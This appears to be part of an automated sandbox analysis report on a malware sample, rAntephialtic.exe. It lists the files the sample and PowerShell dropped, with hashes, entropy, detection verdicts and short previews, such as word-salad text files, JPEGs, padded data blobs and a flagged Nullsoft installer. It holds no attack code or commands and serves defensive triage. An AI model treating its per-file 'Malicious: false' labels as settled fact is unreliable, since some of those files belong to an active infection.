Preview: PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm
Note: the PSMODULECACHE magic and the list of module manifests and cmdlet names identify this as PowerShell's module analysis cache, which powershell.exe rewrites during normal module discovery. Its modification is a side effect of the PowerShell host starting, not an action of the sample; the cmdlet names in the preview are the catalogue of the SmbShare module, not commands the sample ran.
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Reputation: high, very likely benign file
Preview: # PowerShell test file to determine AppLocker lockdown mode
Note: the report lists this identical 60-byte file four times as separate dropped files. It is the probe file powershell.exe itself writes to the user's temp directory at start-up to learn whether an AppLocker script policy would constrain it, so it is an artifact of the PowerShell host rather than of the sample; its hashes are useful only for filtering it out of triage.
                                                                                                                                                    Process:C:\Users\user\Desktop\rAntephialtic.exe
                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):7168
                                                                                                                                                    Entropy (8bit):5.260607917694217
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:JXmkmwmHDqaRrlfAF4IUIqhmKv6vBckXK9wSBl8gvElHturnNQaSGYuHr2DCP:JAjRrlfA6Nv6eWIElNurnNQZGdHc
                                                                                                                                                    MD5:4C77A65BB121BB7F2910C1FA3CB38337
                                                                                                                                                    SHA1:94531E3C6255125C1A85653174737D275BC35838
                                                                                                                                                    SHA-256:5E66489393F159AA0FD30B630BB345D03418E9324E7D834B2E4195865A637CFE
                                                                                                                                                    SHA-512:DF50EADF312469C56996C67007D31B85D00E91A4F40355E786536FC0336AC9C2FD8AD9DF6E65AB390CC6F031ACA28C92212EA23CC40EB600B82A63BE3B5B8C04
                                                                                                                                                    Malicious:false
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                     • Filename: rfacturapendiente.exe, Detection: malicious
                                                                                                                                                     • Filename: 046s01900330081250b4057885818022025.exe, Detection: malicious
                                                                                                                                                     • Filename: comprobante de pago56789076pdf.exe, Detection: malicious
                                                                                                                                                     • Filename: comprobante de pago56789076pdf.exe, Detection: malicious
                                                                                                                                                     • Filename: kdrajK1oD8.exe, Detection: malicious
                                                                                                                                                     • Filename: NBKi8t8shT.exe, Detection: malicious
                                                                                                                                                     • Filename: CtB0cM3RQI.exe, Detection: malicious
                                                                                                                                                     • Filename: Dialyseapparatet.exe, Detection: malicious
                                                                                                                                                     • Filename: Dialyseapparatet.exe, Detection: malicious
                                                                                                                                                     • Filename: PO8732401895.exe, Detection: malicious
                                                                                                                                                    Process:C:\Users\user\Desktop\rAntephialtic.exe
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):463
                                                                                                                                                    Entropy (8bit):4.285410789028991
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:HM2cnAd5V3Lu9fFJPS2Zy+xk5Jc5F+Xj5mEuR8u7PGv:HZAgEfFJPS2HW5J6AXlmEq8yGv
                                                                                                                                                    MD5:C15FC961D85C5922BE099765BDE7EBD5
                                                                                                                                                    SHA1:2F68A352847AC266BC724D5B8430102BC3E71418
                                                                                                                                                    SHA-256:18D0F24F70590B47A0A229BC2244645D17610E485167755B7ACF787C61706E68
                                                                                                                                                    SHA-512:71CDEEE0E02344DD237EF26B70DDBAA2F1F990D5C41918933EF8375703149B7F1A925593AB901ADD22DA4C2423FE210F8E6BF50FABFBC13CB901F49C98D3E83A
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:....;spidsning drumbeating salgsstrukturers afskar arveonklernes,misfornjelsens whereness digressingly spiralformede gigis searobin..unsalvableness uninspiring aastedet expellent kindness cliffing lkkeris.Animatedly forebygg serries......nonliteracy sprogrenserens dauerschlaf stubmarkers undelve namibia outvote threadfish pelorian purlgen duppeditter,unbrave rebribe ultrasevere calemes rearhorse satsarbejdernes imponeringers burry cannoneering eksekverendes..
                                                                                                                                                    Process:C:\Users\user\Desktop\rAntephialtic.exe
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):474
                                                                                                                                                    Entropy (8bit):4.449594528102945
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:KiN3x/+6Fe6gmOOM3RUqVaUPfFxijApORSIRlLiZ:t5ctaOOyakFxij3SIRa
                                                                                                                                                    MD5:0A3891B25E2CFE64897EC83CC688BFE0
                                                                                                                                                    SHA1:3A36F7C16EA94E99507A62276937C66FAF60D040
                                                                                                                                                    SHA-256:A657D235DCB9CC0EEF83EEBECD11DB719B484193DFF4A9DBA7EF8D0AD095EAC7
                                                                                                                                                    SHA-512:87A52753B7CD2A1962408D6B589661787F7649349027AB03C0BB8E60022980B3BE16C06B9E43D5FA156E05111B480B3427004D007E599CDC2005BEAB7E8D9A4D
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:....;overnattes huleforskere jammerdalen nobbler.Chloro hyklere indskudsstningerne halshugning index..superconcept forhaandsvarslingers synched degageringen allusorisk moquette pokerlike.Kadmiumforgiftninger symphyses florulae..;meddling slagstiftens antiparallelogram lavets dadlede aadringens.Raceabout slagtervirksomhed trykfejlene hotelize synonym bargehouse..;hokan drnvands latency pedagoguish differentiae,gangliniernes prudently andgtigt rygepausen bicolor unstout..
                                                                                                                                                    Process:C:\Users\user\Desktop\rAntephialtic.exe
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):625
                                                                                                                                                    Entropy (8bit):4.346981835061893
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:42HRUjithTbcRLVZJRQUNECA6tV5SYmLxTqxZA7T18Exak:5HMwVAhZnNEDC5SYIqxa2Ex3
                                                                                                                                                    MD5:75E982C9C6367B0C988F7377D285D11E
                                                                                                                                                    SHA1:5BCE305BB913274807F5D600A06D00DD1D54FFFF
                                                                                                                                                    SHA-256:BC4A5FE23BAFA2F605EAB10AE96DCA68D908E5F73AB384159C01DA452C03A271
                                                                                                                                                    SHA-512:80DD51924497045B7BBACDF60AE69CA94DF76D4939BE764339BDD823E89788F0F9E8090B2276DB4BA08661B030320A19067996D84147CC0FE56CE247CA13D8EC
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:Maskulinitet tiljublet rendejernsbukkeren matey efraims southernest skjolddrageres feculent crystallose swordlet..warragals afgudstempel adresseredes abominability.Maae grundsten upsprang peptonisation..nontheosophical beskftigelsesmuligheder haugen,velsmurt filtration limbu reappraisement goldenmouthed courier marerne redundant..klauss rallybegivenheder tania excentrikeren,retwined fornvnt antrin plasmation trosses outputting..Huserendes stokkes hedeblge subpartition embedslger nontransparence orthosilicic,pladsholderknudernes odonata pyrochemical ncr cikader akaciegummi printernummerets..[opmaaltes stansemaskinen]..
                                                                                                                                                    Process:C:\Users\user\Desktop\rAntephialtic.exe
                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 669x434, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):45798
                                                                                                                                                    Entropy (8bit):7.973397481904929
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:cM3m9xuvi+hnMMNHglywfRAmwcvPvOaXxSIEsP1/Fv4g5DEdxTaHBprETIOX2D:cMwuvi+hnMMAllfRljL7Pwg5gyHBVETq
                                                                                                                                                    MD5:441C487496250F2DFB7932573923DD86
                                                                                                                                                    SHA1:FB02363B0E942CECE3C8BA1C24BAB09167C3D592
                                                                                                                                                    SHA-256:ACD14AA0BB682EE7662A198132A11098A80BC99D93A1A9D77C1D8D2CF3D7F5A8
                                                                                                                                                    SHA-512:0AB656DFD020A3D968A5F73CAE7163803CA3B9B375B9496E2A4F7585CE52113F349CD142E157FC9E68B15C1D47EBD6FA251D589A4E65F90E78E6B5D3945AC7D0
                                                                                                                                                    Malicious:false
                                                                                                                                                    Process:C:\Users\user\Desktop\rAntephialtic.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):834783
                                                                                                                                                    Entropy (8bit):0.15545481722513932
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:fPwzd94kfuV1KVXYopXXMAXJ724+L6SbInN:c
                                                                                                                                                    MD5:8CF61AD68633960A85848816F1902768
                                                                                                                                                    SHA1:73E37B97FEDAC6AB6A82A983EC40A079E64FBCDA
                                                                                                                                                    SHA-256:DD3D3A30C4A58F406EFFA263CA65BFD04BD08D4A420BD97A61D06C6DF96DC2CC
                                                                                                                                                    SHA-512:56873ECB44C976ABD681691096152407878781673DD1611F5DBA38AFDDAFC7D04E23FBFDABC642A6EA72CD12D042A36A4E93B7F27BEAC74CA6FA86AC76051C09
                                                                                                                                                    Malicious:false
                                                                                                                                                    Process:C:\Users\user\Desktop\rAntephialtic.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1777202
                                                                                                                                                    Entropy (8bit):0.16015219303493394
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:NZdLcaEb2se66jcYYc+3/MBG+D4Cy/O4W2yOOqwrqJwXGiO1in3aCMG2nYQnE+iC:m
                                                                                                                                                    MD5:18792410AE3448F9E8A70C30AF90C500
                                                                                                                                                    SHA1:E93DB3F76CAD1E41743DC7F3B16F883805B777D2
                                                                                                                                                    SHA-256:B4E2E7AD894AC23E7A7FCE95C0A30A15CA4A72A035C5CFA2831121A4DC9001CC
                                                                                                                                                    SHA-512:973D927F472E68855A8394A35E805282AEE7B2F2CA1DAC6A9F3993070F83754385CEC7CF9807BB3CCBF873CFBC1F157972DC9CB49863283B13D478DC2F4749F6
                                                                                                                                                    Malicious:false
                                                                                                                                                    Process:C:\Users\user\Desktop\rAntephialtic.exe
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):610
                                                                                                                                                    Entropy (8bit):4.3419673803904475
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:7DCoMTTXEOc7+z+uePx55q2YXr2oJPbskWm8LkXRA0m:8XC7+z+nPxa2YXr2U3WxLkXHm
                                                                                                                                                    MD5:8C956E8A51D4D31917BB453285EC6734
                                                                                                                                                    SHA1:74BA53D1343A5A261936B290CC6A9841AFF34620
                                                                                                                                                    SHA-256:7D65FEF133FA3B2EAA33C7A807D282E46B2C09D1AF6A542C6CA45F8DB8D4FBAD
                                                                                                                                                    SHA-512:9A8BFA7CECD8217C4B3678CB0A025D2FEFDA2B04DBBCB1E20D7DB965F9CADEBEA95972AF5E5C1538C6C8AA1B5077B5C16C76C6A60BF86F876095052983C6E4D3
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:;bredsaaningen elints reklamebureauets experient bevaegelser,elapsoidea eugonic ovulating dyttenes almoner..;eftergring maaleligt transuranium torgerd legalese nongestical ptilopaedes.Fjortenaarsfdselsdagene probenecid flyvetanken bordlampe diclidantheraceae....;sloganises phenomenalists augmentationers deklaration taeniate.Zymomin nev agathin frimenighedsprsternes scabridulous serials inwick..;strstevrdi legislatrixes aagerkarleklers reduvius furnaced mollugo.Ichnography desexed unmelodiousness..belbsfelter indulges forvildes pinedd verticalism fremtidsinvestering.Arbejdsvrelsernes hvirvlerne carryon..
                                                                                                                                                    Process:C:\Users\user\Desktop\rAntephialtic.exe
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):574
                                                                                                                                                    Entropy (8bit):4.3159136745391455
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:dRhgPELCCqvfcm2SMNBAGBAIaCJNBLtZVh1LAUMJQ:drbCCIGSMXSfCz/ZVLAfQ
                                                                                                                                                    MD5:D64B04CC79D5C3D46C30BB627DCBF1CB
                                                                                                                                                    SHA1:4F6AFC5F0BF2806525CB31490484A55733E4EA70
                                                                                                                                                    SHA-256:846370130857F4DEA6DA94F180F37C36A2BFFDED12521FA2D3DB6632061EDAC6
                                                                                                                                                    SHA-512:80D9BEC6B29B1413D6E94105B3EEF731715A3B2807F6226904C17B77E62105CEF9199D79661551560FF5E6A195A3E2B04A0A5920EE39ED28D3BD5C0B248B58B7
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:Truenames endodontically universitetslektorerne undergrundsbanes wesleyism samvittighedsfangernes borupgaard,jonosfres bellwethers overdredged........contorsion inconfused forfatteres cephalothecal biometeorology aspekterne sandsigerskes haplophyte hngepilenes troopials akillesseneskade.Smutteres tandle polytypic..Foreningernes knsrolledebattens udstoppe parteringen ddsdagen befrugtningen forhandlerprovisioner..Kuldets desicate jernmalme ustabiliteter fempersonersvognene,reasoningly pseudoprogrammerne branchesikkerhedsraadenes semeia frromantiske refornrmelser........
                                                                                                                                                    Process:C:\Users\user\Desktop\rAntephialtic.exe
                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 667x500, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):55919
                                                                                                                                                    Entropy (8bit):7.96956286635437
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:MAX52ZbaWd4+MVdxtxkUVqSofd572u1WmHXo:rXkV4+MVDYSId91P4
                                                                                                                                                    MD5:B4B76AE6B932FFB7D57B4C8DF841BBEB
                                                                                                                                                    SHA1:449B07A3670D74C95FB96F4C40112CFA206243F4
                                                                                                                                                    SHA-256:F97A2AF3EE944378630965996859802B13BF9360F3620D399B3C25564F37AE9E
                                                                                                                                                    SHA-512:7DFD72EFF63F064B31837682381F2A404AB0EF6B1D11E80DE3A0E97707AE7E0D626A1E8E4F3CFBC0EC0393ADE0E24D4E35A6DBE4E74DEDB6664ACD9577E92554
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..j..Q...jr....-L.:....tmI...%...H'k......4.gO.w..I.0 .?.^.[5...h..WeY..YUO,..........._..y-.i..T.3.k47....x.P.....^....vLSH..j."&..OcQ..CM<R.i5B..iM%0.LR.Lbb...(..b.OzL.OZ.~8..>...n)@...1..Py..&(..O......N.S...@.m......Rd.H..))...1..".Q.r...X....;...R\U.p.e+.....T..r)..pi+..2...WX.8.v.kU *..j. .j...L..i6T..i.f..!+Q..X...Z...Lc....f.i..zx.5"..F..c'....NA..h.
                                                                                                                                                    Process:C:\Users\user\Desktop\rAntephialtic.exe
                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 765x344, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):32338
                                                                                                                                                    Entropy (8bit):7.90959515142178
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:GPM/0hKYUJyytmHwIOGNKiKAyeEvo3xWHsAQFw:GWJvmHdOGci7yeQo3xHAQFw
                                                                                                                                                    MD5:A84ED7F45E9D797422768B79D7390449
                                                                                                                                                    SHA1:87BD9AE56281C46B69F3B1E84A4C356F5DE0AB0F
                                                                                                                                                    SHA-256:3656A1BD761421F016C6184814AF2CA3CAB411A7E532DA48D7920F2D749BBD13
                                                                                                                                                    SHA-512:2616E0C4A29FB72B621E0B49249452E0D680F7181C2F8DBAF229E25423F21F60BC55BB47A202414B07E6B71437F011898514ED9EB454055A69BD852A99B2DA69
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......X...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....i....~.0.>....*..gi..&.9....Ev...&8.0. Rc..V...".p......:........4.]..).e..v9.>.zc..l.....'&...)1.i.B8..qH@...4..z..C@.".r.b@..........`..`t....U..W?.0.t..PF8..... ........Q....rw.O..L..T.>[...2q......z.i.............`..s...f8.......S....(b.r..$.....}..J..._...q..4..8.H......@..J..9...E.....(......1....)c.\...x.z.j@Y[..VD.~.P!..~s.O8.T*....?....*..z
                                                                                                                                                    Process:C:\Users\user\Desktop\rAntephialtic.exe
                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 749x479, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):15781
                                                                                                                                                    Entropy (8bit):7.415973903642444
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:pEmK8JnhaNWk30siFad2cp2UkWd6onMpxk:puKhQ7pd2clkWdt
                                                                                                                                                    MD5:F6F27A712E777AFE756D14C24B527A2D
                                                                                                                                                    SHA1:5DA328EBB559369275A5636C4EBB3E3C226996DE
                                                                                                                                                    SHA-256:720DE1AB410F13AC413647A2D0EEDC3CD15893F8D3D6CC35ACC6E99A05130078
                                                                                                                                                    SHA-512:0D4CC9A93B49A0CCD0D3D2163F2C5E4206795C87F0B5F539331CE56A52933B9490818F47D36BB6D496686999E88D3E7A77280FB563C9E3CD584434013ED5C6E5
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(.
                                                                                                                                                    Process:C:\Users\user\Desktop\rAntephialtic.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4165987
                                                                                                                                                    Entropy (8bit):0.15857241558665142
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:EyKRRVLZZsWDpQIkxCHjAzMNUvmqYvspVpKS+k8uLQUgMSel0Q+Kk1FRxM8sUNrV:Mn
                                                                                                                                                    MD5:B1B085431111505CDA09720950FC532C
                                                                                                                                                    SHA1:D9E6F01EC573C46B135C4189D7E195520E4833DB
                                                                                                                                                    SHA-256:C4C36E403368A4D35E9C2D177F01E218579D94F7C22BC2C4915F772A38CB4931
                                                                                                                                                    SHA-512:1A2BAB946F29B2C5552895AB362C0E4A06F8FD5201715F7FACD8A33E75E02FF2367F75DAC2A134C2160CEC0179728B03ACEBFC98BF3255980FB83CD9BA6DFE0F
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:**************************.***********************************************************************************************************************************************************************************************************.*******************************************************************************************************************************************.***************************`***************************.*************************************************************************m*************************************************************************************3********************************************************************************************************************************************************************************************************************.**********************************************************************************************.*******************************************************************..************************************
                                                                                                                                                    Process:C:\Users\user\Desktop\rAntephialtic.exe
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):313
                                                                                                                                                    Entropy (8bit):4.771903534530474
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6:UJ1TU8vduu7be+tH3WhCMLm3rkTDTsHXA9XR1QA3vWypoEZL2l+sZpz4vm:mTUqdx7iKH3DKm7knTsHXsR1QREsPz4O
                                                                                                                                                    MD5:AD268120B7E4BD3DB824FBAEC6C7F638
                                                                                                                                                    SHA1:83A98AF3992CFBDA1A24391B73AE67D8154A1071
                                                                                                                                                    SHA-256:4BF97831EB3A8729A621666C0388F6C0A05CF9526CEE7C17CFC31615685CE691
                                                                                                                                                    SHA-512:B1ADF403FADB423A8CA3FDC3851C2A4741DCF879A1D25180EC290AE3226C228EF1FDE235DAA49FC8A39B4ABD8F4ED7B3F66D826778E15CE68D8081F0C19A6FC1
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:..;cortie calculably almengjorte translatress klodsens.Acetonen perionychia zygomaticoauricular spiserens indfrtes dompaps fotos..;schweiziske wouhleche brynza planera skrtende inklineret bevesselled.Bistriate femogtyvererne castellated unpackers landingspunkts synchronizables..[UNINDIVIDUALIZED OVICELL]........
                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1542704
                                                                                                                                                    Entropy (8bit):7.856567991289499
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24576:nMwM9cEY0ASIJSEwseD6Ph717SM5vw+WDC5InZ/L9GrsXpJzXo1AH9HBevK9Y9Ey:nMwLhcOPhNSM9w+wCyig5JzXo1AtBUK2
                                                                                                                                                    MD5:65249FEBEC3F7BDE1C51B92FF5D3C4A7
                                                                                                                                                    SHA1:459C11B637DC859EACEA6D65489729F7B32FBF27
                                                                                                                                                    SHA-256:F9D051B1D729D3A1689E7B1454902012A5D757F5B5339DB346FFCEAD746802F6
                                                                                                                                                    SHA-512:E739A509AA7029116395A436F6B9C07E9E74BAE0E81C312E0E0663C315BE862A118B18D60C45B72268B47AD09A13ED0C9DB54D4F97EBA474C154D14D8CBE9A1C
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....$_.................f...*.......4............@.......................................@.............................................0..............H............................................................................................text....d.......f.................. ..`.rdata...............j..............@..@.data...8............~..............@....ndata...0...............................rsrc...0...........................@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):26
                                                                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                    Malicious:true
                                                                                                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                    Process:C:\Users\user\Desktop\rAntephialtic.exe
                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 480x416, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):36806
                                                                                                                                                    Entropy (8bit):7.956850684990401
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:+Nfzn6TJvlZ4hADVPnzAEhhYtaojHA55S4FEVEYVROZdfnQYO0/tpUFesjBRpK:+Nfz2v+ADNzAAhYtaobOS4FGrVROZd3n
                                                                                                                                                    MD5:4DB33BE25F1E1D25059022ABD05359E1
                                                                                                                                                    SHA1:E38EDDCAE8796545A628F1F2301F5A483E0FDB86
                                                                                                                                                    SHA-256:E084825640637BC0C74FD402D4C986F4E839655B3E62E5E5A18055B92407170E
                                                                                                                                                    SHA-512:6B292BABCB9E13ED3A8F17BADF5389F7347C1FB7D0CC1D6750E1016AB394974DF92DBF70ED87B99BBB4EC837BB52F7F097273A07566EEA4435A7398D05FF6282
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..`.X.w..".#q99.T..m.....^zS"..0zt..pI..O...0..@XL.`c.)..84..y.:U{..c $a.u9.@......Q...{.Y...0....?....B.c.........r)q...*....^2..(9.).h.......Hc.=0{P...*._....&......8. ..,yq..:t..Rg...{$..'.CR..v.P.3......w.SG....UO.9.......X.dUV.....P....@?*.q.5..7"...8'..R.....%.p..`i.k...i6...T.P.i.q.'....R.<~..S.t...N..M..{..s.[9....$..u.4.....qA.O..Z.H.A.1.
                                                                                                                                                    Process:C:\Users\user\Desktop\rAntephialtic.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):5824326
                                                                                                                                                    Entropy (8bit):0.1594766001009489
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:z9P2ViubtsGp3Cw9zGCFpfDcdq45foLVgHmmR06w9X53gNqy4+Bm0jdrXbQWetc6:023YJFH0/TS
                                                                                                                                                    MD5:614CE653D682B46D8560C1AD4F3FE0F3
                                                                                                                                                    SHA1:3F2A7E680258DA8EEAA793720CA58EF2B18A7EBC
                                                                                                                                                    SHA-256:8253C88DCCEDFCC4E9B27FE3A09C3F840879015B2163C35E60802387D0795B76
                                                                                                                                                    SHA-512:9E296E9FE6A1C8C76675C41CF62286FDDDBA75A5E736707761D04CBA1B7D678E1E78A640174EDF3A2817054261A069DEF012F05DD95CFAD75C439974DC3E1825
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.....................................................................................................................................................................................................................................................................*............................................................................................................................................................................................................................................................................................................................................................................................................................................................$......................................................................................................................................................................................................................................................................................0...........
                                                                                                                                                    Process:C:\Users\user\Desktop\rAntephialtic.exe
                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 48x472, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4605
                                                                                                                                                    Entropy (8bit):7.881550983596204
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:RhdEdkobro3HFWRGa1Ktdv7ox3CcKtRei+FGZJRbf1:LdiTb3n2dv7qfKtIRF8bd
                                                                                                                                                    MD5:B20C125A5BB14FD227955D7E852FA7EE
                                                                                                                                                    SHA1:57232CA021980B6BD6E793EE0FA55A87F047CFAB
                                                                                                                                                    SHA-256:63DB8569038CF7EC962EAD4B4759D8E5965FCE7DBCC89BA005672987AD256DEA
                                                                                                                                                    SHA-512:121CB6E0DF0AEDAF6563A29E5F24A8230561C3E4751A7F771949D4034D7737E1C0036BA768B24713B4B0D1C36F9D1267DEABA572D4F52E15E12B1A28CE2393E1
                                                                                                                                                    Malicious:false
